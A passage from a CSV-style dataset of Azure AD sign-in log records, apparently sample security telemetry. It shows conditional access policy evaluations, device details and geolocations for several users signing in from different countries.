AD joined'}",f680c335-bc78-44a8-8570-454300db0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,f680c335-bc78-44a8-8570-454300db0600,SigninLogs,Sucess,13,105
+1582,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:29.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4708af31-f73a-4fe9-983c-7636018af3ac,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",f81997e3-0b26-42cc-8532-c4de32a20700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,f81997e3-0b26-42cc-8532-c4de32a20700,SigninLogs,Sucess,50.6406517,5.572050095
+1583,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:35.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bc95ce0a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,87802367-3de7-42c2-ada0-d6bc95ce0a00,SigninLogs,Sucess,33.0175209,35.44601059
+1584,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:36.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bcbece0a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,87802367-3de7-42c2-ada0-d6bcbece0a00,SigninLogs,Sucess,33.0175209,35.44601059
+1585,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:20.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,80491e3a-73fc-4e8c-a6e7-5e9e36a8014a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,O365 Suite UX,4345a7b9-9a63-4910-a426-35363201d503,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003f75b70700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5a052e7e-2284-4115-9ddd-003f75b70700,SigninLogs,Sucess,28,3
+1586,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:31.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ff36d2ab-e852-4f2e-85fb-8ba01dba9c89,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003f29b80700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a052e7e-2284-4115-9ddd-003f29b80700,SigninLogs,Sucess,28,3
+1587,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:33.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2781abb8-02ef-4fc3-8031-bbcb2fd61fcf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5f11d930-41ca-43a7-b362-f3cee7610600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,5f11d930-41ca-43a7-b362-f3cee7610600,SigninLogs,Sucess,28,3
+1588,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:09.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,48eca259-39f7-454e-bcb4-fb433795c605,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",37105d23-9607-4aeb-a84b-5fa3d3710700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,37105d23-9607-4aeb-a84b-5fa3d3710700,SigninLogs,Sucess,13,105
+1589,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:35.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b82b022-7914-48ec-b9e6-5a554c21726c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': 